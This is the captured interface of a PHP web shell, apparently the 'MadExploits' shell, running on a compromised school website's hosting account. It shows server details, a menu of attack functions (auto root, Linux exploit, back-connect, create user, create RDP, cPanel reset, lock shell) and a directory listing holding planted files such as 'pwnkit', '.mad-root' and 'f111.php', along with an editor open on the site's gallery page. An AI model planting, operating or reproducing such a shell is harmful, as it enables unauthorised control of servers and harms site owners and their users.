Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.146.206.246
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
bharyallahri /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
blogheaderg
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
commentsos
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
.htaccess
243
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rwxr-xr-x
academic.php
10.43
KB
-rwxr-xr-x
addmission.php
1.76
KB
-rwxr-xr-x
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.32
KB
-rwxr-xr-x
config.php
625
B
-rwxr-xr-x
contact.php
1.88
KB
-rwxr-xr-x
error_log
759.14
MB
-rwxr-xr-x
f111.php
77.56
KB
-rw-r--r--
favicon.ico
2.56
KB
-rwxr-xr-x
footer.php
6.18
KB
-rwxr-xr-x
gallery.php
1.53
KB
-rwxr-xr-x
header.php
11.19
KB
-rwxr-xr-x
index.php
5.03
KB
-r--r--r--
news-coverage.php
1.63
KB
-rwxr-xr-x
pedagogy.php
1.25
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rwxr-xr-x
shining-star.php
8.56
KB
-rwxr-xr-x
style2.php
9.14
KB
-rw-r--r--
tc.php
3.14
KB
-rwxr-xr-x
theschool.php
4.28
KB
-rwxr-xr-x
toppers.php
5.37
KB
-rwxr-xr-x
wp-add.php
6.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gallery.php
<?php include('header.php'); ?> <div class="site-section ftco-subscribe-1 site-blocks-cover pb-4" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-end"> <div class="col-lg-6"> <h2 class="mb-0">Gallery</h2> </div> <div class="col-lg-6 text-right"> <a href="index.php">Home</a> <span class="mx-3 icon-keyboard_arrow_right"></span> <span class="current">Gallery</span> </div> </div> </div> </div> <!--Why Us Start--> <div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>Gallery</span> </h2> </div> </div> <div class="row"> <div class="col-12"> <?php $qurey = "SELECT * FROM `gallery` WHERE status='active' "; $result = mysqli_query($con, $qurey); while($row = mysqli_fetch_array($result)) { ?> <div class="col-lg-3 col-md-3 col-sm-12 gallery-box"> <figure class="thumnail"> <a target="_blank" href="/myadmin/gallery/<?php echo $row['photo']; ?>"> <img src="/myadmin/gallery/<?php echo $row['photo']; ?>" alt="Akal Academy" class="img-responsive" width="300" height="250"></a> </figure> </div><?php } ?> </div> </div> </div> <!--Features End--> <?php include('footer.php'); ?>
Close